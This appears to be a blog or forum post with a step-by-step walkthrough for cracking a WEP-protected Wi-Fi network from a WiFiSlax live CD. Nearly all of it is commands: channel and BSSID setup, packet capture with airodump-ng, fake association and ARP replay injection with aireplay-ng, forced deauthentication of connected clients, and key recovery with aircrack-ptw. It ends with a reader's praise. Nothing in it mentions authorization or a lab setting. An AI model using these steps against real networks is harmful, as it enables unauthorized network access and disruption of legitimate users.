Requirement
Notebook with Intel Centrino Chipset 2200 above
WiFiSlax 3.1 (Download)
Cup of coffee with two biscuts ;p
Instruction
Download WiFISlax image and burn to CD
Boot the notebook using the CD
Login using “root” and password is “toor“
Once started, open the X:
startx
Note: This CD contains Spanish language, use Google Translate if needed
Step 1: Load Driver
To load Intel driver, click K Menu >Asistencia Chipset >Asistencia Intel pro wireless >Cargar ipw3945 injection (depend on your chipset)
To find target Channel, use Kismet to scan all network wireless (K Menu >Wifislax>Herramientas Wireless > Kismet)
Step 2: Start Capturing
Set the channel of the Access Point in the NIC
echo 'Channel' > /sys/class/net/wifi0/device/channel
Scan all wireless network to get the BSSID and the ESSID type:
airodump-ng rtap0
Finish the execution with CONTROL-C
Set the BSSID in the NIC
echo 'BSSID' > /sys/class/net/wifi0/device/bssid
Start capturing using the command
airodump-ng -c CHANNEL -w /path/to/save/OUTPUT_FILE rtap0
Step 3: Injection Traffic
Capturing take a while so open new terminal window and set speed 2Mbps:
echo '2' > /sys/class/net/wifi0/device/rate
Activate the NIC:
ifconfig wifi0 up
Look at your MAC address
Initiate an association with the Access Point
aireplay-ng -1 0 AP_BSSID -h YOUR_MAC_ADDRESS_WIFI -e AP_ESSID wifi0
Start the injection traffic:
aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h YOUR_MAC_ADDRESS_WIFI wifi0
This should increment the number of data in capture window.
Step 4: Deauthenticate clients if needed
Deauthenticate Clients if needed to increase the ARP request capture, type:
aireplay-ng -0 15 -a AP_BSSID -c CLIENT_MAC_ADDRESS_WIFI wifi0
Step 5: Apply Aircrack-PTW
When the data packet between 40,000 and 85,000+ data, extract the key by executing:
aircrack-ptw /path/to/save/OUTPUT_FILE.cap
and voila..
Found key with len 05: XX XXXXXXXX
where XX XXXXXX is WEP Key
This is manual tip using WIfiSlax. I will give you easy way how to retrieve WEP key using the same tool..
wow superb sharing greattttttt
